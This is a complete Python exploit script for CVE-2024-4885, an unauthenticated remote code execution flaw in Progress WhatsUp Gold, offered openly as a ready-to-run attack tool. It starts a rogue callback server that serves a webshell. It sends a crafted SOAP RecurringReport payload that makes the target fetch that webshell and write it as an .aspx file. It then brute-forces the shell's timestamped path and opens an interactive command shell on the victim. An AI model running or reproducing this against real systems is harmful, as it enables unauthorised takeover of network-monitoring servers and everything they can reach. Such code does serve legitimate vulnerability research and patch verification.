"""
Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885)
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
"""


banner = r"""
 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                    
        (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-4885)
        
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
        
        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-rce-cve-2024-4885/
        
        """

""""""

from http.server import HTTPServer, SimpleHTTPRequestHandler
import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
from threading import Thread
import os
import datetime
import json
from time import sleep

print(banner)
parser = argparse.ArgumentParser(usage="python CVE-2024-4885.py --target http://192.168.0.231:9642 --callback-server http://192.168.0.181:1337")
parser.add_argument('--target', '-t', dest='target_url', help='Target URL (e.g: http://192.168.0.231:9642)', required=True)
parser.add_argument('--webshell', '-f', dest='webshell_file', help='webshell file to upload', required=True)
parser.add_argument('--callback', '-s', dest='callback_server',  help='Rogue callback server 192.168.0.181:1337', required=True)
parser.add_argument('--target-user-id', '-u', dest='target_user_id', help='user id to leak',default='1', required=False)
args = parser.parse_args()
args.target = args.target_url.rstrip('/')
start_find = False

class CustomHandler(SimpleHTTPRequestHandler):
    def do_PUT(self):
        global start_find
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        webshell = {"webshell": open(args.webshell_file, "r").read()}
        self.wfile.write(json.dumps(webshell).encode())
        print(f"(*) Waiting 180s for the RecurringReport task to land...")
        start_find = True
        
        
    def do_GET(self) -> None:
        try:
            print("(+) Callback received")
            query_string = self.path.split("?")[1]
        except:
            print("")
        
        self.send_response(200)
        self.end_headers()    
        
        
    

def start_callback_server(ip, port):
    global server_ready
    httpd = HTTPServer((ip, port), CustomHandler)
    print(f"(*) Callback server listening on http://{ip}:{port}")
    server_ready = True
    httpd.serve_forever()
    
def find_web_shell(webshell_base_name):
    start_time = datetime.datetime.now() - datetime.timedelta(seconds=5)
    end_time = start_time + datetime.timedelta(minutes=2)

    potentials = []

    dt = start_time
    while dt <= end_time:
        potentials.append(dt.strftime("%Y-%m-%d_%H-%M-%S"))
        dt += datetime.timedelta(seconds=1)
    target_host = args.target_url.split(':')[1].replace('//', '').rstrip('/')
    try:
        print(f"(*) Checking if target is using HTTPS or HTTP " + f"https://{target_host}/NmConsole/")
        res = s.get(f"https://{target_host}/NmConsole/")
        if(res.status_code == 200):
            target_host = f"https://{target_host}"
        else:
            target_host = f"http://{target_host}"
    except:
        target_host = f"http://{target_host}"
    print(f"(*) Target host: {target_host}")
    
    for potential in potentials:
        
        possible_path = f"{target_host}/NmConsole/Data/ExportedReports/{webshell_base_name}_{potential}.aspx"

        print(f"(*) spraying... {possible_path}")
        
        try:
            response = requests.head(possible_path, timeout=10, verify=False)

            if response.status_code == 200:
                print(f"(+) Web shell found at -> {possible_path}")
                break


        except requests.RequestException as ex:
            print(f"Failed to send request for {possible_path}. Exception: {ex}")
    post_exploit(possible_path)


 

def exploit():
    random_name = os.urandom(8).hex()
    xml_response = r'''<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><TestRecurringReport xmlns="http://tempuri.org/"><rr xmlns:a="http://schemas.datacontract.org/2004/07/WUGDataAccess.RecurringReports.DataContracts" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:AlternateHost i:nil="true"/><a:Disabled>false</a:Disabled><a:EmailSettings xmlns:b="http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts"><b:Authentication>None</b:Authentication><b:CredentialsId i:nil="true"/><b:DirectoryPath>C:\PROGRA~2\Ipswitch\WhatsUp\Data\ScheduledReports</b:DirectoryPath><b:Password/><b:Port>25</b:Port><b:SMTPServer/><b:SendFrom>WhatsUpGold@YourDomain.com</b:SendFrom><b:SendTo i:nil="true"/><b:Subject>Emailing: Wireless Log</b:Subject><b:TimeoutSec>5</b:TimeoutSec><b:UseEncryptedConn>false</b:UseEncryptedConn><b:Username/></a:EmailSettings><a:ExportOptions><a:AuthorName>WhatsUp Gold</a:AuthorName><a:AutosizePDFPage>true</a:AutosizePDFPage><a:AvoidImageBreak>false</a:AvoidImageBreak><a:AvoidTextBreak>true</a:AvoidTextBreak><a:BrowserPageHeight>0</a:BrowserPageHeight><a:BrowserPageWidth>0</a:BrowserPageWidth><a:ConversionDelay>3</a:ConversionDelay><a:CustomPageHeight>0</a:CustomPageHeight><a:CustomPageWidth>0</a:CustomPageWidth><a:ExportAuthToken/><a:ExportType>html</a:ExportType><a:FitHeight>false</a:FitHeight><a:FitWidth>false</a:FitWidth><a:InternalLinksEnabled>false</a:InternalLinksEnabled><a:LiveURLsEnabled>false</a:LiveURLsEnabled><a:NavigationTimeout>240</a:NavigationTimeout><a:PageOrientation>Portrait</a:PageOrientation><a:PageSize>Letter</a:PageSize><a:PdfMessage>html</a:PdfMessage><a:PreviewEnabled>false</a:PreviewEnabled><a:Subject i:nil="true"/><a:TimeFormat>g:i:s a</a:TimeFormat><a:Title i:nil="true"/><a:ToMail>true</a:ToMail><a:WebExportDirectory>C:\\Program Files (x86)\\Ipswitch\\WhatsUp\\html\\NmConsole\\</a:WebExportDirectory><a:ZipEnabled>false</a:ZipEnabled></a:ExportOptions><a:IncludeURLInEmail>false</a:IncludeURLInEmail><a:Name>REPLACE_WEBSHELL_NAME</a:Name><a:NextRun i:nil="true"/><a:RecurringReportID>-1</a:RecurringReportID><a:Schedule xmlns:b="http://schemas.datacontract.org/2004/07/WUGDataAccess.Core.DataContracts"><b:DailyDays>1</b:DailyDays><b:DailyOptions>Interval</b:DailyOptions><b:DaysOfTheWeek xmlns:c="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean><c:boolean>true</c:boolean></b:DaysOfTheWeek><b:MonthlyDayMonths>1</b:MonthlyDayMonths><b:MonthlyDayNumber>3</b:MonthlyDayNumber><b:MonthlyOptions>DayOfMonth</b:MonthlyOptions><b:MonthlyRecur>First</b:MonthlyRecur><b:MonthlyRecurDay>Sunday</b:MonthlyRecurDay><b:MonthlyRecurMonths>1</b:MonthlyRecurMonths><b:RecurringInterval>1</b:RecurringInterval><b:RecurringTimeIntervals>Minutes</b:RecurringTimeIntervals><b:ScheduleType>TimeInterval</b:ScheduleType><b:StartTime>2024-07-05T16:59:14.047957+01:00</b:StartTime><b:TimeIntervalStartDate>2024-07-05T16:59:14.047957+01:00</b:TimeIntervalStartDate><b:WeeklyWeeks>1</b:WeeklyWeeks><b:YearlyDayOfMonth>3</b:YearlyDayOfMonth><b:YearlyMonthRecur>First</b:YearlyMonthRecur><b:YearlyMonthRecurDay>Sunday</b:YearlyMonthRecurDay><b:YearlyMonths>March</b:YearlyMonths><b:YearlyOptions>DayOfYear</b:YearlyOptions><b:YearlyRecurMonth>March</b:YearlyRecurMonth></a:Schedule><a:URL>{"title":"foo","renderType":"aspx","reports":[{"title":"thetitle","url":"/NmConsole/api/Wireless/ReportWirelessLog","dateRangeFilter":{"label":"Date Range","n":0,"range":"Today","text":"Today"},"severityFilter":{"label":"Severity","value":-1,"text":"ALL"},"limit":50,"grid":{"emptyText":"[ No records found ]","columns":[{"dataIndex":"Date","text":"Date","flex":1},{"dataIndex":"Severity","text":"Severity","flex":1},{"dataIndex":"Message","text":"Message","flex":1}],"filters":[],"sorters":[]}}],"baseUrl":"http://REPLACE_CALLBACK","userId":REPLACE_USER_ID}</a:URL><a:WebUserID>1</a:WebUserID><a:WebUserName>admin</a:WebUserName></rr></TestRecurringReport></s:Body></s:Envelope>'''.replace("REPLACE_WEBSHELL_NAME", random_name).replace("REPLACE_CALLBACK", args.callback_server).replace("REPLACE_USER_ID", args.target_user_id)
    headers = {
        "Content-Type": "text/xml; charset=utf-8",
        "SOAPAction": "http://tempuri.org/IRecurringReportServices/TestRecurringReport"
    }
    print(f"(+) Sending payload to {args.target_url}/NmConsole/ReportService.asmx")
    r = s.post(f"{args.target}/NmAPI/RecurringReport", headers=headers, data=xml_response)
    if(r.status_code != 200):
        print(f"(-) Failed to send payload: {r.text}")
        exit(1)
    print(f"(+) Payload sent successfully")
    return random_name


def post_exploit(shell_path):
    while True:
        cmd = input("Shell> ")
        
        r =s.get(f"{shell_path}", params={"hax":cmd}, verify=False)
        print(r.text)
s = requests.Session()
s.verify = False
print("\n(^_^) Prepare for the Pwnage (^_^)\n")
callback_server_thread = Thread(target=start_callback_server, args=(args.callback_server.split(":")[0], int(args.callback_server.split(":")[1]),))
callback_server_thread.setDaemon(False)
callback_server_thread.start()


webshell_base_name = exploit()
find_web_shell_thread = Thread(target=find_web_shell, args=(webshell_base_name,))
find_web_shell_thread.setDaemon(False)
find_web_shell_thread.start()